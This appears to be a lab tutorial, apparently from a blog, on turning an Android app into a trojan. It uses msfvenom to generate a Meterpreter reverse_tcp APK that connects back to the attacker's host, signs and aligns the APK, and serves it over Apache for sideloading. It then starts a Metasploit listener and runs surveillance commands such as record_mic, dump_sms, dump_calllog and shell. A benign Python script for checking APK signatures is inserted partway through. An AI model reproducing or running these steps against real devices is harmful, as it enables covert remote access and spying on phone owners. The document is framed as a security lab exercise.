Mar 17, 2025, 05:45 AM
11. Creating a malicious APK (Android Package Kit file format):

In Kali, open the terminal and execute the following command to generate the malicious APK:

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=<your-ip-address> LPORT=4444 R > android.apk

Note: Replace <your-ip-address> with the IP address of the Kali machine, which must be reachable from the Android device.

An APK file (Android Package Kit) is the file format for applications installed on Android.

Below is the breakdown of what the command means:

msfvenom: Metasploit Framework tool for generating payloads.
-p android/meterpreter/reverse_tcp: Specifies the Android Meterpreter reverse TCP payload; once the app is launched on the device it connects back to LHOST:LPORT.
LHOST=<your-ip-address>: Sets the attacker's IP address for the connection.
LPORT=4444: Sets the port for the connection (the listener set up later must use the same port).
R: Specifies raw output format; for Android payloads msfvenom emits a complete (unsigned) APK.
> android.apk: Redirects the output to an APK file named "android.apk".

Signing the APK

Android only installs an APK that carries a valid signature, so first generate a keystore holding a key pair and a self-signed certificate that will sign android.apk:

sudo keytool -genkey -v -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

keytool: Java tool for managing cryptographic keys and certificates.
-genkey: Generates a new key pair and a self-signed certificate for it.
-v: Enables verbose output for more detailed information.
-keystore key.keystore: Specifies the filename of the keystore file to be created (key.keystore).
-alias hacked: Sets an alias (identifier) for the key entry in the keystore (hacked).
-keyalg RSA: Specifies the algorithm to generate the key pair (RSA).
-keysize 2048: Sets the size of the key (2048 bits).
-validity 10000: Sets the validity period of the certificate in days (10000 days).

keytool prompts for a keystore password and for the certificate's name fields; remember the password, because jarsigner asks for it again.
Install the jarsigner tool (it ships with the JDK):

sudo apt-get install openjdk-11-jdk-headless

jarsigner is a command-line tool used to digitally sign Java Archive (JAR) files. An APK is a JAR-style ZIP archive, so the same tool signs it; this produces what Android calls a v1 (JAR) signature. Signing is required because the Android package installer refuses an unsigned APK, and the signature ties every entry in the archive to the signer's certificate, so a modified APK fails verification. Note that jarsigner only produces v1 signatures: Android 11 and later require a v2 or newer signature (produced by apksigner from the Android build tools) for apps that target API level 30 or higher, while apps targeting older API levels still install with a v1 signature alone.

Sign the APK file using jarsigner:

sudo jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android.apk hacked

Explanation of each part of the command:

-verbose: Prints detailed information about the signing process.
-sigalg SHA1withRSA: Specifies the signature algorithm. SHA1withRSA is what older tutorials use for compatibility with very old Android releases; SHA-1 is deprecated, recent JDKs print a warning about it, and SHA256withRSA works on Android 4.3 and later.
-digestalg SHA1: Specifies the digest algorithm used for the per-entry digests written to the manifest; SHA-256 is the current choice, for the same reason.
-keystore key.keystore: Specifies the keystore file containing the private key used for signing.
android.apk: Specifies the APK file you want to sign.
hacked: Specifies the alias of the key within the keystore.

Run the command from the directory that holds key.keystore and android.apk, or give their full paths. jarsigner prompts for the keystore password; on success it adds META-INF/MANIFEST.MF, META-INF/HACKED.SF and META-INF/HACKED.RSA (the signature file and certificate block are named after the alias) to the APK and reports "jar signed".

Verify that the application is signed:

sudo jarsigner -verify -verbose -certs android.apk

Explanation of each part of the command:

-verify: Instructs jarsigner to verify the signature of the JAR file.
-verbose: Prints detailed information about the verification process, one line per entry with flags such as "sm" (signature verified, entry listed in manifest).
-certs: Prints the certificates associated with the APK during verification.
android.apk: Specifies the APK file you want to verify.

If the verification is successful, jarsigner prints "jar verified." together with the subject of the signing certificate. Because no -keystore was given here, the signature is checked only against the certificate embedded in the APK, so expect a warning that the certificate chain is invalid or self-signed; that is normal for a certificate generated with keytool. Adding -keystore key.keystore to the command makes jarsigner additionally confirm that the embedded certificate is the one held in your keystore.

Install the zipalign tool:

sudo apt-get install zipalign

zipalign is an Android build tool that pads an APK so that every uncompressed entry starts on a 4-byte boundary relative to the start of the file. Android can then map such entries (resources, native libraries) directly from the APK instead of copying them into memory, which reduces RAM use and is why every APK should be aligned before distribution. Mind the order: with a v1 (jarsigner) signature you sign first and align afterwards, because the v1 signature covers the entries' contents and not their offsets; an apksigner v2+ signature covers the whole file and would be broken by alignment, so it must be applied after zipalign.

Align the .apk file with zipalign:
sudo zipalign -v 4 android.apk signed_jar.apk

zipalign: Android tool for aligning APK files.
-v: Enables verbose output for more detailed information.
4: Specifies the alignment requirement in bytes (4-byte alignment).
android.apk: Specifies the input (signed) APK file to be aligned.
signed_jar.apk: Specifies the output aligned APK file.

Running sudo zipalign -v 4 android.apk signed_jar.apk threw the error below:
zipalign: symbol lookup error: zipalign: undefined symbol: _ZN11zip_archive6WriterD2Ev

A symbol lookup error at start-up means the zipalign binary was built against a different version of one of its shared libraries (here the zip_archive library) than the one installed on the system, so the package from the Kali repository does not match its dependency.

Uninstall the broken package so that a matching version can be installed in its place:

sudo apt --purge remove zipalign
Then visit this link. I picked the zipalign package under Debian 10 because it matches my Kali Linux.

I clicked on the first zipalign link under Debian 10; then scroll down to the Downloads section and copy the link for the amd64 package.

Copy the link and fetch it on Kali Linux (for example with wget).

After the zipalign package is downloaded, make sure it is in the current directory, then run the following command to install it:

sudo apt install ./zipalign_*_amd64.deb

Verify the installation by running zipalign with no arguments; it should print its usage text instead of the symbol lookup error.

Align the .apk file with zipalign again:
sudo zipalign -v 4 android.apk signed_jar.apk

With a working binary the command lists each entry with "(OK)" or the padding it added and ends with "Verification succesful". You can also confirm alignment of the output on its own with zipalign -c -v 4 signed_jar.apk, which only checks and exits non-zero if any entry is misaligned.
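The two verification steps above (jarsigner -verify and zipalign) can be reproduced without either tool, which is useful when you want to inspect an APK on a box that has neither, or when you want to see what the tools actually do. The script below is an added example and is not part of the original post: it lists the META-INF files a v1 signer adds, checks for an APK Signing Block (the v2+ signature jarsigner never produces), finds stored entries that are not 4-byte aligned, and realigns them by zero-padding the local extra field, which is the same trick zipalign uses. The sample APK it builds is constructed inline (a stored entry, a deflated classes.dex and placeholder META-INF files named after the alias "hacked"); it is not the msfvenom output.

```python
"""Checks that mirror jarsigner -verify and zipalign on an APK (a ZIP file):
which v1 (JAR) signature files META-INF/ carries, whether an APK Signing
Block (v2+) is present, which stored entries are misaligned, and a
pure-Python realignment that pads the local extra field exactly as zipalign
does. Added example; the sample APK built below is constructed, not real."""
import io
import struct
import zipfile

LOCAL_HEADER_LEN = 30                  # fixed part of a ZIP local file header
SIG_BLOCK_MAGIC = b"APK Sig Block 42"  # trailer magic of the APK Signing Block


def v1_signature_files(apk: bytes) -> list:
    """Names of the JAR-signature artefacts a v1 signer (jarsigner) adds."""
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:
        return sorted(n for n in zf.namelist()
                      if n.startswith("META-INF/")
                      and n.upper().endswith((".SF", ".RSA", ".DSA", ".EC")))


def has_v2_signing_block(apk: bytes) -> bool:
    """True if an APK Signing Block sits directly before the central directory
    (where apksigner puts v2/v3 signatures; jarsigner never writes one)."""
    eocd = apk.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("no end-of-central-directory record: not a ZIP")
    cd_offset = struct.unpack_from("<I", apk, eocd + 16)[0]
    return cd_offset >= 16 and apk[cd_offset - 16:cd_offset] == SIG_BLOCK_MAGIC


def _data_offset(apk: bytes, info: zipfile.ZipInfo) -> int:
    """Offset of an entry's payload, taken from its *local* header (the local
    extra field, which zipalign pads, can differ from the central-directory copy)."""
    name_len, extra_len = struct.unpack_from("<HH", apk, info.header_offset + 26)
    return info.header_offset + LOCAL_HEADER_LEN + name_len + extra_len


def misaligned_entries(apk: bytes, alignment: int = 4) -> list:
    """Stored (uncompressed) entries whose data does not start on an
    `alignment` boundary; `zipalign -c 4` fails on an APK with any of these."""
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:
        return [info.filename for info in zf.infolist()
                if info.compress_type == zipfile.ZIP_STORED
                and _data_offset(apk, info) % alignment]


def zipalign(apk: bytes, alignment: int = 4) -> bytes:
    """Rewrite the archive so every stored entry's data starts on an
    `alignment` boundary by zero-padding its local extra field. Entry contents
    are unchanged, so a v1 signature (covering contents, not offsets) survives;
    a v2 signature, which covers the whole file, would not."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(apk)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            new = zipfile.ZipInfo(info.filename, info.date_time)
            new.compress_type = info.compress_type
            new.external_attr = info.external_attr
            if info.compress_type == zipfile.ZIP_STORED:
                # the local header is written at the current end of the file
                data_off = out.tell() + LOCAL_HEADER_LEN + len(info.filename.encode("utf-8"))
                new.extra = b"\x00" * ((-data_off) % alignment)
            dst.writestr(new, src.read(info.filename))
    return out.getvalue()


def build_sample_apk(signed: bool) -> bytes:
    """Constructed stand-in for android.apk: a stored entry with a 3-byte name
    (its data lands at offset 33, so it is misaligned), a deflated classes.dex
    and, optionally, the META-INF files jarsigner adds for the alias 'hacked'."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(zipfile.ZipInfo("abc"), b"stored payload", zipfile.ZIP_STORED)
        zf.writestr("classes.dex", b"dex" * 64, zipfile.ZIP_DEFLATED)
        if signed:  # contents are placeholders; only the names matter here
            zf.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
            zf.writestr("META-INF/HACKED.SF", b"Signature-Version: 1.0\n")
            zf.writestr("META-INF/HACKED.RSA", b"\x30\x82")
    return buf.getvalue()


def report(apk: bytes) -> dict:
    """The summary a reviewer wants before an APK goes onto a device."""
    return {"v1_signature_files": v1_signature_files(apk),
            "v2_signing_block": has_v2_signing_block(apk),
            "misaligned": misaligned_entries(apk)}


if __name__ == "__main__":
    sample = build_sample_apk(signed=True)
    print("before zipalign:", report(sample))
    print("after  zipalign:", report(zipalign(sample)))
```

To run it against the real file, replace the sample with open("signed_jar.apk", "rb").read(); an APK signed only by jarsigner shows the two HACKED.* files and v2_signing_block False, and a correctly aligned one has an empty misaligned list.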

Next, start the Apache web server on Kali Linux and place the APK in its document root so that it can be downloaded on the Android device through its web browser.

Use the command service apache2 start to start the web server, then service apache2 status to check and confirm it is running.

Copy the aligned APK into the web root with sudo cp signed_jar.apk /var/www/html. Ensure that signed_jar.apk exists in the current directory, or give the correct path if it is located elsewhere. You can list /var/www/html to check that the file was copied successfully.

Install Mozilla Firefox on the Android device running in VMware.

In Firefox, type the IP address of the Kali machine followed by the file name, like this: 192.168.xxx.xxx/signed_jar.apk, then click Allow on the pop-up.

Click Download to download the APK.

Click Next.

Click Allow. This is where Android asks for permission to install an app from this source; a device with default settings blocks such sideloading, and the install only proceeds because that protection is switched off.

Click Done.

Setting up the listener on Metasploit on Kali Linux

Start the handler before opening the app on the device: the payload retries the connection, but the session only appears once something is listening on LHOST:LPORT.

Open the Metasploit console:
sudo msfconsole
Load the multi/handler module:
use exploit/multi/handler
Set the payload to the one built with msfvenom:
set payload android/meterpreter/reverse_tcp
Set LHOST and LPORT to the same values used with msfvenom:
set LHOST <your-ip-address>
set LPORT 4444
Start the listener:
run

Once the app is opened on the device a Meterpreter session opens. Use the following commands to gather information:

sysinfo: Display system information.
check_root: Check if the device is rooted.
record_mic: Record audio from the device's microphone.
dump_calllog: Retrieve the call log.
getuid: Get the user ID the app is running as.
ps: List running processes.
shell: Drop into a command shell on the device.
dump_sms: Dump the SMS messages stored on the device.
ifconfig: Get network interface information.

Interface 7 shows the IP address of the Android device.

This is the end of the exploitation: I was able to get into the Android device through a malicious APK that was downloaded and installed on it because of relaxed security settings (installation from unknown sources allowed). Through the Meterpreter session I was able to gather a great deal of information from the device, such as the call log, running processes and network information, and to send SMS messages, capture the SMS messages it had sent, and much more.